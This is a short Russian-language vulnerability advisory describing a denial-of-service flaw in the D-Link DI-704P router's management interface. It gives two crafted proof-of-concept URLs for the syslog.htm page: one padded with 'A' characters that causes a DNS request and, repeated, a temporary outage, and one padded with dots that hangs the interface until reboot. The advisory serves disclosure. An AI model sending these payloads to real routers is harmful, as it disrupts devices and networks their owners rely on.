Отказ в обслуживании обнаружен в D-Link DI-704P Router. Удаленный авторизованный пользователь может завесить работу управляющего интерфейса.
Удаленный авторизованный пользователь может послать специально сформированный URL к управляющему интерфейсу маршрутизатора, чтобы нарушить работу устройства. Следующий URL заставит устройство выполнить DNS запрос:
http://192.168.0.1/syslog.htm?
D=AAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA
Результат DNS запроса будет следующий:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA AAAAAAAAAAAA AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA @xxxx.xx.comcast.net
Если представлено несколько подобных URL запросов, временный отказ в обслуживании
произойдет на маршрутизаторе.
Следующий тип URL завесит управляющий интерфейс маршрутизатора, пока он не будет перезагружен: (работа маршрутизатора не нарушится):
http://192.168.0.1/syslog.htm?
D=............................. ............................................
...........................................................................
............................................... ............................
...........................................................................
............................................................... ............
...........................................................................
...........................................................................
.. .........................................................................
...........................................................................
.................. .........................................................
....................
Уязвимость обнаружена в D-Link DI-704P.
